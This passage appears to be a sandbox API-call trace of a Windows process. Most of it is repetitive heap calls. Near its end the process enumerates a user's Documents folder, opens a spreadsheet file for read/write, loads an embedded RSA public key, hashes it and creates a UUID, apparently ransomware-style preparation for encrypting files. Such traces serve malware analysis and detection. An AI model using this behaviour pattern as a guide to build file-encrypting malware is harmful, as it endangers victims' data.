(HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.570] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\") returned="ivoTJ\\" [0194.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.571] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\") returned="PeBfuwtoR 4\\" [0194.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0194.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.571] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0194.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d423d0 [0194.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0194.571] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0194.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d423d0 | out: hHeap=0x6a0000) returned 1 [0194.571] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0194.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.572] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0194.572] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.572] PathFindFileNameW (pszPath="") returned="" [0194.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.572] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7730c240, ftCreationTime.dwHighDateTime=0x1d8a53a, ftLastAccessTime.dwLowDateTime=0xe06955a0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0xe06955a0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa50 [0194.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.577] FindNextFileW (in: hFindFile=0x2cbfa50, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7730c240, ftCreationTime.dwHighDateTime=0x1d8a53a, ftLastAccessTime.dwLowDateTime=0xe06955a0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0xe06955a0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.577] FindNextFileW (in: hFindFile=0x2cbfa50, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc4487b0, ftCreationTime.dwHighDateTime=0x1d8a4c5, ftLastAccessTime.dwLowDateTime=0xc2693f00, ftLastAccessTime.dwHighDateTime=0x1d8a5c4, ftLastWriteTime.dwLowDateTime=0xc2693f00, ftLastWriteTime.dwHighDateTime=0x1d8a5c4, nFileSizeHigh=0x0, nFileSizeLow=0x1211a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JgOlJrnOpIeAMFOF-hp.ots", cAlternateFileName="JGOLJR~1.OTS")) returned 1 [0194.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0194.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.578] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\JgOlJrnOpIeAMFOF-hp.ots") returned=".ots" [0194.578] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\JgOlJrnOpIeAMFOF-hp.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\jgoljrnopieamfof-hp.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0194.581] GetFileSizeEx (in: hFile=0x574, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=74010) returned 1 [0194.581] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.584] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x120f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.584] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.586] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.586] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1211a, lpOverlapped=0x0) returned 1 [0194.587] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.587] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.587] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.587] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0194.588] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.588] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.588] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.588] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.589] GetLastError () returned 0x0 [0194.589] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0194.589] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0194.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.589] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.589] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.589] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12120) returned 0x2d49778 [0194.590] SetFilePointer (in: hFile=0x574, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.590] RtlAllocateHeap 